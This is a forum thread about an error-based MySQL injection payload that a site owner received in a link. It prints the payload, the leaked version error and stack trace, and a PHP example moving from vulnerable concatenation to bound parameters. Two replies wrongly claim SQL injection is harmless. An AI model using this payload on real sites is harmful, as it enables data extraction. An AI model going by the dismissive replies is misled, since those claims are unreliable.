MySQL
Vladislav Startsev, 2016-01-12 19:54:25

What does the following SQL injection give a potential attacker?

Someone sent a former colleague a link containing an SQL injection and recommended closing the vulnerability.
/site/view?page=3&sect=14&theme=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat((select%20version()))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))
Injection itself:

(select 1 and row(1,1)>(select count(*), concat(concat((select version())), floor(rand()*2))x 
from (select 1 union select 2)a group by x limit 1))

And the site error:
Fatal error: Uncaught exception 'Zend_Db_Statement_Exception' with message 'SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '5.5.33-0+wheezy1-log1' for key 'group_key'' in /var/ZendFramework-1.0.3/library/Zend/Db/Statement/Pdo.php:227
Stack trace:
#0 /var/ZendFramework-1.0.3/library/Zend/Db/Statement.php(279): Zend_Db_Statement_Pdo->_execute(Array)
#1 /var/ZendFramework-1.0.3/library/Zend/Db/Adapter/Abstract.php(396): Zend_Db_Statement->execute(Array)
#2 /var/ZendFramework-1.0.3/library/Zend/Db/Adapter/Pdo/Abstract.php(206): Zend_Db_Adapter_Abstract->query('SELECT c.`Name`...', Array)
#3 /var/ZendFramework-1.0.3/library/Zend/Db/Adapter/Abstract.php(693): Zend_Db_Adapter_Pdo_Abstract->query('SELECT c.`Name`...', Array)
#4 /var/www/pageparts/consultation/org.php(23): Zend_Db_Adapter_Abstract->fetchRow('SELECT c.`Name`...')
#5 /var/www/gorobzor/index.php(264): include('/var/www/pagepa...')
#6 {main}
thrown in /var/ZendFramework-1.0.3/library/Zend/Db/Statement/Pdo.php on line 227

The problem is in &theme=. The reason is clear, only here...
Question: What does this give a potential attacker?


3 answer(s)
Rsa97, 2016-01-12
@Rsa97

This query managed to get the MySQL version (5.5.33-0+wheezy1-log1).
After rewriting the query, you can try to get the names of the tables, then their structure, then the data from these tables. Well, or issue a DROP DATABASE command.
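
One way to close the hole in org.php, as an added example rather than the site's own code: the stack trace only shows the query as 'SELECT c.`Name`...', so the table, column names and the use of the sect parameter below are assumptions; the vulnerable shape is shown beside the parameterised, input-validated form.

```php
<?php
// Added example, not code from the question's site. The query shape, the table
// `consultation` and its columns are assumptions; only 'SELECT c.`Name`...' and
// the fetchRow() call are visible in the stack trace.

// Vulnerable pattern the trace implies: the request parameter is concatenated
// straight into the SQL, so theme=(select ...) becomes part of the statement and
// the resulting 1062 duplicate-key error echoes version() back to the visitor.
function fetchOrgVulnerable(Zend_Db_Adapter_Abstract $db, array $get)
{
    $sql = 'SELECT c.`Name` FROM consultation c WHERE c.theme = ' . $get['theme'];
    return $db->fetchRow($sql);
}

// Hardened version: every numeric id is validated as a plain non-negative
// integer before use and passed to Zend_Db as a bound parameter.
function intParam(array $get, $name)
{
    if (!isset($get[$name]) || !ctype_digit((string) $get[$name])) {
        return null; // anything that is not digits only is rejected
    }
    return (int) $get[$name];
}

function fetchOrgSafe(Zend_Db_Adapter_Abstract $db, array $get)
{
    $theme = intParam($get, 'theme');
    $sect  = intParam($get, 'sect');   // assumed second id, taken from the URL
    if ($theme === null || $sect === null) {
        return false; // caller renders a generic 404 / bad-request page
    }
    // Positional placeholders are bound by the adapter (PDO prepared statement),
    // so the value is only ever compared, never parsed as SQL.
    $sql = 'SELECT c.`Name` FROM consultation c WHERE c.theme = ? AND c.sect = ?';
    return $db->fetchRow($sql, array($theme, $sect));
}

// Separately, stop handing the stack trace to the visitor: log it server-side
// and show a generic page. In php.ini (or ini_set() before bootstrap):
//   display_errors = Off
//   log_errors     = On
```

With the parameters bound, the same theme value simply matches no row; with display_errors off, a failed probe no longer reports the server version or file paths.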

romy4, 2016-01-12
@romy4

SQL injections do nothing for attackers. This is just an excuse for the developer to squeeze money out of the customer after leaving such holes.

xmoonlight, 2016-01-12
@xmoonlight

This one is absolutely nothing.
